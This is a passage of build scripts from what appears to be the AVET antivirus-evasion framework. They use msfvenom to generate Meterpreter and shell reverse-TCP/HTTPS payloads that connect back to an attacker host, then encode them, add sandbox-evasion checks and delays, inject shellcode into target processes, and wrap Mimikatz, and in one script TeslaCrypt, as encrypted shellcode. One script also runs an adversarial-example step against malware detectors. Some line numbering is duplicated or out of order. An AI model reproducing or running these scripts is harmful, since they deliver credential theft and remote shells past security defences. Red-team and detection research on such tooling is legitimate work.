aabbcc12de input/key_raw.txt 35 | # enable debug print 36 | enable_debug_print 37 | #CONFIGURATION_END 38 | 39 | 40 | # generate metasploit payload that will later be injected into the target process 41 | msfvenom -p windows/x64/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x64/xor -f raw -a x64 --platform Windows > input/sc_raw.txt 42 | 43 | # add evasion techniques 44 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 45 | add_evasion gethostbyname_sandbox_evasion 'this.that' 46 | reset_evasion_technique_counter 47 | 48 | # encode msfvenom shellcode 49 | encode_payload xor input/sc_raw.txt input/scenc_raw.txt input/key_raw.txt 50 | 51 | # array name buf is expected by 
static_from_file retrieval method 52 | ./tools/data_raw_to_c/data_raw_to_c input/scenc_raw.txt input/scenc_c.txt buf 53 | 54 | # set shellcode source 55 | set_payload_source static_from_file input/scenc_c.txt 56 | 57 | # convert generated key from raw to C into array "key" 58 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 59 | 60 | # set key source 61 | set_key_source static_from_file input/key_c.txt 62 | 63 | # set payload info source 64 | set_payload_info_source from_command_line_raw 65 | 66 | # set decoder 67 | set_decoder xor 68 | 69 | # set shellcode binding technique 70 | set_payload_execution_method inject_shellcode 71 | 72 | # compile 73 | $win64_compiler -o output/injectshc_targetfromcmd_fopen_gethostbyname_xor_revhttps_win64.exe source/avet.c -lws2_32 74 | strip output/injectshc_targetfromcmd_fopen_gethostbyname_xor_revhttps_win64.exe 75 | 76 | # cleanup 77 | cleanup_techniques 78 | 79 | 80 | echo " 81 | # Usage example of generated injectshc_targetfromcmd_fopen_gethostbyname_xor_revhttps_win64.exe: 82 | # $ injectshc_targetfromcmd_fopen_gethostbyname_xor_revhttps_win64.exe first second 480 83 | 84 | # The first and second command line parameters can be arbitrary strings, as they are not used. We just need the third command line parameter. 85 | # Use the third parameter to specify the PID of the process you want to inject your payload into. 86 | " 87 | -------------------------------------------------------------------------------- /build/build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revtcp_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Shellcode injection 32-bit example build script 6 | # Creates an executable that injects the payload into a target process 7 | # The target is specified on execution via the third(!) 
command line argument, by PID 8 | #DESCRIPTION_END 9 | 10 | 11 | # print AVET logo 12 | cat banner.txt 13 | 14 | # include script containing the compiler var $win32_compiler 15 | # you can edit the compiler in build/global_win32.sh 16 | # or enter $win32_compiler="mycompiler" here 17 | . build/global_win32.sh 18 | 19 | # import feature construction interface 20 | . build/feature_construction.sh 21 | 22 | # import global default lhost and lport values from build/global_connect_config.sh 23 | . build/global_connect_config.sh 24 | 25 | 26 | #CONFIGURATION_START 27 | # override connect-back settings here, if necessary 28 | LPORT=$GLOBAL_LPORT 29 | LHOST=$GLOBAL_LHOST 30 | # no command preexec 31 | set_command_source no_data 32 | set_command_exec no_command 33 | # generate key file 34 | generate_key preset aabbcc12de input/key_raw.txt 35 | # enable debug print 36 | enable_debug_print 37 | #CONFIGURATION_END 38 | 39 | 40 | # generate metasploit payload that will later be injected into the target process 41 | # use reverse_tcp because the 32-bit test system appears to not handle https well 42 | msfvenom -p windows/meterpreter/reverse_tcp lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -f raw -a x86 --platform Windows > input/sc_raw.txt 43 | 44 | # add evasion techniques 45 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 46 | add_evasion gethostbyname_sandbox_evasion 'this.that' 47 | reset_evasion_technique_counter 48 | 49 | # encode msfvenom shellcode 50 | encode_payload xor input/sc_raw.txt input/scenc_raw.txt input/key_raw.txt 51 | 52 | # array name buf is expected by static_from_file retrieval method 53 | ./tools/data_raw_to_c/data_raw_to_c input/scenc_raw.txt input/scenc_c.txt buf 54 | 55 | # set shellcode source 56 | set_payload_source static_from_file input/scenc_c.txt 57 | 58 | # convert generated key from raw to C into array "key" 59 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 60 | 61 | # set key source 62 | 
set_key_source static_from_file input/key_c.txt 63 | 64 | # set payload info source 65 | set_payload_info_source from_command_line_raw 66 | 67 | # set decoder 68 | set_decoder xor 69 | 70 | # set shellcode binding technique 71 | set_payload_execution_method inject_shellcode 72 | 73 | # compile 74 | $win32_compiler -o output/injectshc_targetfromcmd_fopen_gethostbyname_xor_revtcp_win32.exe source/avet.c -lws2_32 75 | strip output/injectshc_targetfromcmd_fopen_gethostbyname_xor_revtcp_win32.exe 76 | 77 | # cleanup 78 | cleanup_techniques 79 | 80 | echo " 81 | # Usage example of generated injectshc_targetfromcmd_fopen_gethostbyname_xor_revtcp_win32.exe: 82 | # $ injectshc_targetfromcmd_fopen_gethostbyname_xor_revtcp_win32.exe first second 480 83 | 84 | # The first and second command line parameters can be arbitrary strings, as they are not used. We just need the third command line parameter. 85 | # Use the third parameter to specify the PID of the process you want to inject your payload into. 86 | " 87 | -------------------------------------------------------------------------------- /build/build_kaspersky_fopen_shellrevtcp_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # This is (was) for Kaspersky, since meterpreter is recognized by its in-memory scanner. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . 
build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make shell tcp reverse payload, encoded with shikata_ga_nai 37 | # additionaly to the avet encoder, further encoding should be used 38 | msfvenom -p windows/shell/reverse_tcp lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > input/sc_c.txt 39 | 40 | # Apply AVET encoding 41 | encode_payload avet input/sc_c.txt input/scenc_raw.txt 42 | 43 | # add fopen sandbox evasion technique 44 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 45 | 46 | # format into c array for static include 47 | ./tools/data_raw_to_c/data_raw_to_c input/scenc_raw.txt input/scenc_c.txt buf 48 | 49 | # set shellcode source 50 | set_payload_source static_from_file input/scenc_c.txt 51 | 52 | # set decoder and key source 53 | # AVET decoder requires no key 54 | set_decoder avet 55 | set_key_source no_data 56 | 57 | # set payload info source 58 | set_payload_info_source no_data 59 | 60 | # set shellcode binding technique 61 | set_payload_execution_method exec_shellcode 62 | 63 | # compile to exe file 64 | $win32_compiler -o output/kaspersky_fopen_shellrevtcp_win32.exe source/avet.c 65 | strip output/kaspersky_fopen_shellrevtcp_win32.exe 66 | 67 | # cleanup 68 | cleanup_techniques 69 | 70 | 71 | echo " 72 | # Execute the following command: 73 | # $ kaspersky_fopen_shellrevtcp_win32.exe 74 | " 75 | -------------------------------------------------------------------------------- /build/build_mimikatz_pe2shc_xorfromcmd_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Example script that uses an executable file 
as input, here Mimikatz. 6 | # Converts the exe to shellcode using the pe_to_shellcode tool by Hasherezade: 7 | # https://github.com/hasherezade/pe_to_shellcode 8 | # 9 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 10 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 11 | # Executes the executable as 64-bit shellcode. 12 | # Applied XOR encryption with a dynamic key, provided from the command line at run time. 13 | #DESCRIPTION_END 14 | 15 | 16 | # print AVET logo 17 | cat banner.txt 18 | 19 | # include script containing the compiler var $win64_compiler 20 | # you can edit the compiler in build/global_win64.sh 21 | # or enter $win64_compiler="mycompiler" here 22 | . build/global_win64.sh 23 | 24 | # import feature construction interface 25 | . build/feature_construction.sh 26 | 27 | # import global default lhost and lport values from build/global_connect_config.sh 28 | . build/global_connect_config.sh 29 | 30 | 31 | #CONFIGURATION_START 32 | # override connect-back settings here, if necessary 33 | LPORT=$GLOBAL_LPORT 34 | LHOST=$GLOBAL_LHOST 35 | # no preexec command 36 | set_command_source no_data 37 | set_command_exec no_command 38 | # generate key file 39 | generate_key preset aabbccddee input/key_raw.txt 40 | # enable debug print 41 | enable_debug_print 42 | #CONFIGURATION_END 43 | 44 | 45 | # convert mimikatz executable into shellcode format 46 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/mimikatz.exe.shc 47 | 48 | # encode mimikatz shellcode 49 | encode_payload xor input/mimikatz.exe.shc input/mimikatz_enc_raw.txt input/key_raw.txt 50 | 51 | # convert raw shellcode into c format for static include 52 | ./tools/data_raw_to_c/data_raw_to_c input/mimikatz_enc_raw.txt input/mimikatz_enc_c.txt buf 53 | 54 | # set shellcode source 55 | set_payload_source static_from_file input/mimikatz_enc_c.txt 56 | 57 | # setting to retrieve the decryption key dynamically 
from command line in format "aabbccddee" 58 | set_key_source from_command_line_hex 59 | 60 | # set payload info source: not needed 61 | set_payload_info_source no_data 62 | 63 | # specify XOR decoding 64 | set_decoder xor 65 | 66 | # select 64-bit shellcode binding technique 67 | set_payload_execution_method exec_shellcode64 68 | 69 | # compile final payload 70 | $win64_compiler -o output/mimikatz_pe2shc_xorfromcmd_win64.exe source/avet.c 71 | strip output/mimikatz_pe2shc_xorfromcmd_win64.exe 72 | 73 | # cleanup 74 | cleanup_techniques 75 | 76 | 77 | echo " 78 | # The decryption key is aabbccddee if it has not been changed. 79 | # You need to provide the decryption key as 2nd command line argument. 80 | # Call generated executable on target like: 81 | # $ mimikatz_pe2shc_xorfromcmd_win64.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 82 | " -------------------------------------------------------------------------------- /build/build_pause_rc4_mimikatz.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #DESCRIPTION_START 4 | # Calls system("pause") and waits for keypress before executing the payload. 5 | # RC4-encrypt the payload with a static, preset key. 6 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 7 | # pe_to_shellcode is written by Hasherezade: 8 | # https://github.com/hasherezade/pe_to_shellcode 9 | 10 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 11 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 12 | #DESCRIPTION_END 13 | 14 | # print AVET logo 15 | cat banner.txt 16 | 17 | # include script containing the compiler var $win64_compiler 18 | # you can edit the compiler in build/global_win64.sh 19 | # or enter $win64_compiler="mycompiler" here 20 | . build/global_win64.sh 21 | 22 | # import feature construction interface 23 | . 
build/feature_construction.sh 24 | 25 | 26 | #CONFIGURATION_START 27 | # enable debug output 28 | enable_debug_print 29 | # generate key file with preset key 30 | generate_key preset aabbccdd1122 input/key_raw.txt 31 | #CONFIGURATION_END 32 | 33 | ## Invoke system pause 34 | add_evasion interaction_system_pause 35 | 36 | # no command execution 37 | set_command_source no_data 38 | set_command_exec no_command 39 | 40 | # convert mimikatz executable into shellcode format 41 | # Can be of course used with other .exe files 42 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 43 | # encrypt payload 44 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 45 | 46 | # convert encoded, raw payload into c format for static include 47 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 48 | 49 | # set payload source 50 | set_payload_source static_from_file input/sc_enc_c.txt 51 | 52 | # set decoder 53 | set_decoder rc4 54 | 55 | # convert key to c format and include statically 56 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 57 | set_key_source static_from_file input/key_c.txt 58 | 59 | # set payload info source 60 | set_payload_info_source no_data 61 | 62 | # set shellcode binding technique 63 | set_payload_execution_method exec_shellcode64 64 | 65 | 66 | # compile to exe file 67 | $win64_compiler -o output/pause_rc4_mimikatz.exe source/avet.c 68 | strip output/pause_rc4_mimikatz.exe 69 | 70 | # cleanup 71 | cleanup_techniques 72 | 73 | 74 | echo " 75 | # The decryption key is aabbccdd1122 if it has not been changed. 76 | # You need to provide the decryption key as 2nd command line argument. 
77 | # Call generated executable on target like: 78 | # $ pause_rc4_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 79 | " 80 | -------------------------------------------------------------------------------- /build/build_rc4_interactive_pwsh_mimikatz_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #DESCRIPTION_START 4 | # RC4-encrypt the payload with a static, preset key. 5 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 6 | # pe_to_shellcode is written by Hasherezade: 7 | # https://github.com/hasherezade/pe_to_shellcode 8 | 9 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 10 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 11 | #DESCRIPTION_END 12 | 13 | # print AVET logo 14 | cat banner.txt 15 | 16 | # include script containing the compiler var $win64_compiler 17 | # you can edit the compiler in build/global_win64.sh 18 | # or enter $win64_compiler="mycompiler" here 19 | . build/global_win64.sh 20 | 21 | # import feature construction interface 22 | . build/feature_construction.sh 23 | 24 | 25 | #CONFIGURATION_START 26 | # enable debug output 27 | enable_debug_print 28 | # generate key file with preset key 29 | generate_key preset aabbccdd1122 input/key_raw.txt 30 | #CONFIGURATION_END 31 | 32 | # powershell open MessageBox with an ok button 33 | set_command_source static_from_here "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Click OK to Proceed!' 
, 'Interactive')" 34 | set_command_exec exec_via_powershell 35 | 36 | # convert mimikatz executable into shellcode format 37 | # Can be of course used with other .exe files 38 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 39 | # encrypt payload 40 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 41 | 42 | # convert encoded, raw payload into c format for static include 43 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 44 | 45 | # set payload source 46 | set_payload_source static_from_file input/sc_enc_c.txt 47 | 48 | # set decoder 49 | set_decoder rc4 50 | 51 | # convert key to c format and include statically 52 | # NOTE: the key ends up inside the binary next to the ciphertext, so RC4 here only hinders static signature matching; it is not confidentiality. 53 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 54 | set_key_source static_from_file input/key_c.txt 55 | 56 | # set payload info source 57 | set_payload_info_source no_data 58 | 59 | # set shellcode binding technique 60 | set_payload_execution_method exec_shellcode64 61 | 62 | 63 | # compile to exe file 64 | $win64_compiler -o output/rc4_interactive_pwsh_mimikatz_win64.exe source/avet.c 65 | strip output/rc4_interactive_pwsh_mimikatz_win64.exe 66 | 67 | # cleanup 68 | cleanup_techniques 69 | 70 | 71 | echo " 72 | # The RC4 key is aabbccdd1122 if it has not been changed in the configuration section above. 73 | # The key is compiled into the executable (set_key_source static_from_file), so it does not have to be passed on the command line. 74 | # Call generated executable on target like: 75 | # $ rc4_interactive_pwsh_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] 76 | " 77 | -------------------------------------------------------------------------------- /build/build_rc4_interactive_with_arithmetic_pwsh_mimikatz_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #DESCRIPTION_START 4 | # RC4-encrypt the payload with a static, preset key. 5 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 
6 | # pe_to_shellcode is written by Hasherezade: 7 | # https://github.com/hasherezade/pe_to_shellcode 8 | 9 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 10 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 11 | #DESCRIPTION_END 12 | 13 | # print AVET logo 14 | cat banner.txt 15 | 16 | # include script containing the compiler var $win64_compiler 17 | # you can edit the compiler in build/global_win64.sh 18 | # or enter $win64_compiler="mycompiler" here 19 | . build/global_win64.sh 20 | 21 | # import feature construction interface 22 | . build/feature_construction.sh 23 | 24 | 25 | #CONFIGURATION_START 26 | # enable debug output 27 | enable_debug_print 28 | # generate key file with preset key 29 | generate_key preset aabbccdd1122 input/key_raw.txt 30 | #CONFIGURATION_END 31 | 32 | 33 | set_command_source no_data 34 | set_command_exec no_command 35 | 36 | # powershell open MessageBox with text field and ok button 37 | add_evasion interaction_msg_box 38 | 39 | # convert mimikatz executable into shellcode format 40 | # Can be of course used with other .exe files 41 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 42 | # encrypt payload 43 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 44 | 45 | # convert encoded, raw payload into c format for static include 46 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 47 | 48 | # set payload source 49 | set_payload_source static_from_file input/sc_enc_c.txt 50 | 51 | # set decoder 52 | set_decoder rc4 53 | 54 | # convert key to c format and include statically 55 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 56 | set_key_source static_from_file input/key_c.txt 57 | 58 | # set payload info source 59 | set_payload_info_source no_data 60 | 61 | # set shellcode binding technique 62 | set_payload_execution_method exec_shellcode64 
63 | 64 | 65 | # compile to exe file 66 | $win64_compiler -o output/rc4_interactive_with_arithmetic_pwsh_mimikatz_win64.exe source/avet.c 67 | strip output/rc4_interactive_with_arithmetic_pwsh_mimikatz_win64.exe 68 | 69 | # cleanup 70 | cleanup_techniques 71 | 72 | 73 | echo " 74 | # The RC4 key is aabbccdd1122 if it has not been changed in the configuration section above. 75 | # The key is compiled into the executable (set_key_source static_from_file), so it does not have to be passed on the command line. 76 | # Call generated executable on target like: 77 | # $ rc4_interactive_with_arithmetic_pwsh_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] 78 | " 79 | -------------------------------------------------------------------------------- /build/build_rc4enc_mimikatz_adversarial_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # RC4-encrypt the payload with a static, preset key, then run the compiled executable through the adversarial-example generator ($genetic_optimizer, practical manipulation "section_injection"). 6 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 7 | # pe_to_shellcode is written by Hasherezade: 8 | # https://github.com/hasherezade/pe_to_shellcode 9 | 10 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 11 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 12 | # NOTE: as written, the pe2shc step below converts input/teslacrypt.exe rather than input/mimikatz.exe; adjust one or the other before building. 13 | #DESCRIPTION_END 14 | 15 | 16 | # print AVET logo 17 | cat banner.txt 18 | 19 | # include script containing the compiler var $win64_compiler 20 | # you can edit the compiler in build/global_win64.sh 21 | # or enter $win64_compiler="mycompiler" here 22 | . build/global_win64.sh 23 | 24 | # import feature construction interface 25 | . 
build/feature_construction.sh 25 | 26 | 27 | #CONFIGURATION_START 28 | # enable debug output 29 | enable_debug_print 30 | # no command preexec 31 | set_command_source no_data 32 | set_command_exec no_command 33 | # generate key file with preset key 34 | generate_key preset aabbccdd1122 input/key_raw.txt 35 | #CONFIGURATION_END 36 | 37 | 38 | # convert the input executable into shellcode format 39 | # Can be of course used with other .exe files 40 | # NOTE: this reads input/teslacrypt.exe, not input/mimikatz.exe as the description header states. Whatever PE is given here is embedded in the output, so confirm the intended (and safe-to-handle) binary is in place before building. 41 | wine ./../pe_to_shellcode/pe2shc.exe input/teslacrypt.exe input/sc_raw.txt 42 | # encrypt payload 43 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 44 | 45 | # convert encoded, raw payload into c format for static include 46 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 47 | 48 | # set payload source 49 | set_payload_source static_from_file input/sc_enc_c.txt 50 | 51 | # set decoder 52 | set_decoder rc4 53 | 54 | # convert key to c format and include statically 55 | # NOTE: the key ends up inside the binary next to the ciphertext, so RC4 here only hinders static signature matching; it is not confidentiality. 56 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 57 | set_key_source static_from_file input/key_c.txt 58 | 59 | # set payload info source 60 | set_payload_info_source no_data 61 | 62 | # set shellcode binding technique 63 | set_payload_execution_method exec_shellcode64 64 | 65 | 66 | # compile to exe file 67 | $win64_compiler -o output/rc4enc_mimikatz_adversarial_win64.exe source/avet.c 68 | strip output/rc4enc_mimikatz_adversarial_win64.exe 69 | 70 | # generate adversarial example 71 | # $genetic_optimizer is not set in this script; it is expected to come from one of the sourced scripts above — confirm it is defined, otherwise the line below expands to a bare option list. 72 | practical_manipulation="section_injection" 73 | population_size=100 74 | 75 | $genetic_optimizer -pm $practical_manipulation -p $population_size output/rc4enc_mimikatz_adversarial_win64.exe 76 | 77 | # Or use practical manipulation without optimizer 78 | # gen_adversarial_exe section_injection output/rc4enc_mimikatz_adversarial_win64.exe 79 | 80 | # cleanup 81 | cleanup_techniques 82 | 83 | 84 | echo " 85 | # The RC4 key is aabbccdd1122 if it has not been changed in the configuration section above. 
83 | # You need to provide the decryption key as 2nd command line argument. 84 | # Call generated executable on target like: 85 | # $ rc4enc_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 86 | " 87 | -------------------------------------------------------------------------------- /build/build_rc4enc_mimikatz_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # RC4-encrypt the payload with a static, preset key. 6 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 7 | # pe_to_shellcode is written by Hasherezade: 8 | # https://github.com/hasherezade/pe_to_shellcode 9 | 10 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 11 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 12 | #DESCRIPTION_END 13 | 14 | 15 | # print AVET logo 16 | cat banner.txt 17 | 18 | # include script containing the compiler var $win64_compiler 19 | # you can edit the compiler in build/global_win64.sh 20 | # or enter $win64_compiler="mycompiler" here 21 | . build/global_win64.sh 22 | 23 | # import feature construction interface 24 | . 
build/feature_construction.sh 25 | 26 | 27 | #CONFIGURATION_START 28 | # enable debug output 29 | enable_debug_print 30 | # no command preexec 31 | set_command_source no_data 32 | set_command_exec no_command 33 | # generate key file with preset key 34 | generate_key preset aabbccdd1122 input/key_raw.txt 35 | #CONFIGURATION_END 36 | 37 | 38 | # convert mimikatz executable into shellcode format 39 | # Can be of course used with other .exe files 40 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 41 | # encrypt payload 42 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 43 | 44 | # convert encoded, raw payload into c format for static include 45 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 46 | 47 | # set payload source 48 | set_payload_source static_from_file input/sc_enc_c.txt 49 | 50 | # set decoder 51 | set_decoder rc4 52 | 53 | # convert key to c format and include statically 54 | # NOTE: the key ends up inside the binary next to the ciphertext, so RC4 here only hinders static signature matching; it is not confidentiality. 55 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 56 | set_key_source static_from_file input/key_c.txt 57 | 58 | # set payload info source 59 | set_payload_info_source no_data 60 | 61 | # set shellcode binding technique 62 | set_payload_execution_method exec_shellcode64 63 | 64 | 65 | # compile to exe file 66 | $win64_compiler -o output/rc4enc_mimikatz_win64.exe source/avet.c 67 | strip output/rc4enc_mimikatz_win64.exe 68 | 69 | # cleanup 70 | cleanup_techniques 71 | 72 | 73 | echo " 74 | # The RC4 key is aabbccdd1122 if it has not been changed in the configuration section above. 75 | # The key is compiled into the executable (set_key_source static_from_file), so it does not have to be passed on the command line. 
75 | # Call generated executable on target like: 76 | # $ rc4enc_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] 77 | " 78 | -------------------------------------------------------------------------------- /build/build_sleep_rc4_mimikatz.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #DESCRIPTION_START 4 | # Sleeps before executing the payload (add_evasion evasion_by_sleep 300000 below), attempting to time out sandboxes. 5 | # RC4-encrypt the payload with a static, preset key. 6 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 7 | # pe_to_shellcode is written by Hasherezade: 8 | # https://github.com/hasherezade/pe_to_shellcode 9 | 10 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 11 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 12 | #DESCRIPTION_END 13 | 14 | # print AVET logo 15 | cat banner.txt 16 | 17 | # include script containing the compiler var $win64_compiler 18 | # you can edit the compiler in build/global_win64.sh 19 | # or enter $win64_compiler="mycompiler" here 20 | . build/global_win64.sh 21 | 22 | # import feature construction interface 23 | . 
build/feature_construction.sh 23 | 24 | 25 | #CONFIGURATION_START 26 | # enable debug output 27 | enable_debug_print 28 | # generate key file with preset key 29 | generate_key preset aabbccdd1122 input/key_raw.txt 30 | #CONFIGURATION_END 31 | 32 | ## add sleep evasion: delay payload execution to outlast sandbox analysis 33 | ## (300000 is presumably milliseconds, i.e. 5 minutes — check the unit evasion_by_sleep expects) 34 | add_evasion evasion_by_sleep 300000 35 | 36 | # no command execution 37 | set_command_source no_data 38 | set_command_exec no_command 39 | 40 | # convert mimikatz executable into shellcode format 41 | # Can be of course used with other .exe files 42 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 43 | # encrypt payload 44 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 45 | 46 | # convert encoded, raw payload into c format for static include 47 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 48 | 49 | # set payload source 50 | set_payload_source static_from_file input/sc_enc_c.txt 51 | 52 | # set decoder 53 | set_decoder rc4 54 | 55 | # convert key to c format and include statically 56 | # NOTE: the key ends up inside the binary next to the ciphertext, so RC4 here only hinders static signature matching; it is not confidentiality. 57 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 58 | set_key_source static_from_file input/key_c.txt 59 | 60 | # set payload info source 61 | set_payload_info_source no_data 62 | 63 | # set shellcode binding technique 64 | set_payload_execution_method exec_shellcode64 65 | 66 | 67 | # compile to exe file 68 | $win64_compiler -o output/sleep_rc4_mimikatz.exe source/avet.c 69 | strip output/sleep_rc4_mimikatz.exe 70 | 71 | # cleanup 72 | cleanup_techniques 73 | 74 | 75 | echo " 76 | # The RC4 key is aabbccdd1122 if it has not been changed in the configuration section above. 77 | # The key is compiled into the executable (set_key_source static_from_file), so it does not have to be passed on the command line. 
76 | # Call generated executable on target like: 77 | # $ sleep_rc4_mimikatz.exe [your mimikatz arguments, probably 'coffee'] 78 | " 79 | -------------------------------------------------------------------------------- /build/build_sleepbyping_rc4_mimikatz.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #DESCRIPTION_START 4 | # Sleeps for 5 minutes, issuing a timed ping command, attempting to time out sandboxes. 5 | # RC4-encrypt the payload with a static, preset key. 6 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 7 | # pe_to_shellcode is written by Hasherezade: 8 | # https://github.com/hasherezade/pe_to_shellcode 9 | 10 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 11 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 12 | #DESCRIPTION_END 13 | 14 | # print AVET logo 15 | cat banner.txt 16 | 17 | # include script containing the compiler var $win64_compiler 18 | # you can edit the compiler in build/global_win64.sh 19 | # or enter $win64_compiler="mycompiler" here 20 | . build/global_win64.sh 21 | 22 | # import feature construction interface 23 | . 
build/feature_construction.sh 24 | 25 | 26 | #CONFIGURATION_START 27 | # enable debug output 28 | enable_debug_print 29 | # generate key file with preset key 30 | generate_key preset aabbccdd1122 input/key_raw.txt 31 | #CONFIGURATION_END 32 | 33 | # sleep for 300 seconds by waiting for ping to finish 34 | add_evasion sleep_by_ping 300 35 | 36 | # no command execution 37 | set_command_source no_data 38 | set_command_exec no_command 39 | 40 | # convert mimikatz executable into shellcode format 41 | # Can be of course used with other .exe files 42 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 43 | # encrypt payload 44 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 45 | 46 | # convert encoded, raw payload into c format for static include 47 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 48 | 49 | # set payload source 50 | set_payload_source static_from_file input/sc_enc_c.txt 51 | 52 | # set decoder 53 | set_decoder rc4 54 | 55 | # convert key to c format and include statically 56 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 57 | set_key_source static_from_file input/key_c.txt 58 | 59 | # set payload info source 60 | set_payload_info_source no_data 61 | 62 | # set shellcode binding technique 63 | set_payload_execution_method exec_shellcode64 64 | 65 | 